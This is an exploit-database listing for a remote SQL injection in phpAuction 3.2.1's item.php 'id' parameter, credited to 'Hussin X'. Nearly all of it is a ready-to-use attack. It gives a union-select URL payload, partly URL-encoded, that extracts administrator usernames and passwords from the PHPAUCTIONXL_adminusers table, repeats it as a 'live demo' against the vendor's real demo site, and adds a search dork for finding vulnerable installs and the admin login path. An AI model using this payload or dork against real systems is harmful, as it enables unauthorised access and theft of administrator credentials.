[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

phpAuction 3.2.1 (item.php id) Remote SQL Injection Vulnerability

Author
Hussin X
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3252
Category
web applications
Date add
20-06-2008
Platform
unsorted
=================================================================
phpAuction 3.2.1 (item.php id) Remote SQL Injection Vulnerability
=================================================================




#########################################################
#
#    phpauction-gpl Version3.2 Version  SQL Injection Vulnerability
#========================================================
#    Author: Hussin X                                   =
#========================================================
#    HomE script : http://www.phpauction.net
#     
#    Demo : http://www.phpauction.net/phpauction-gpl-3.2/   
#    
#
#    DorK :  Copyright 2007, PHPAUCTION.NET
#
#      
##########################################################

Exploit:   


http://www.site.net/[Pats]/item.php?id=-1+%75%6E%69%6F%6E+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+%66%72%6F%6D+PHPAUCTIONXL_adminusers--



L!VE DEMO:

http://www.phpauction.net/phpauction-gpl-3.2/item.php?id=-1+%75%6E%69%6F%6E+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+%66%72%6F%6D+PHPAUCTIONXL_adminusers--


LogiN:

admin/index.php



#  0day.today [2024-12-25]  #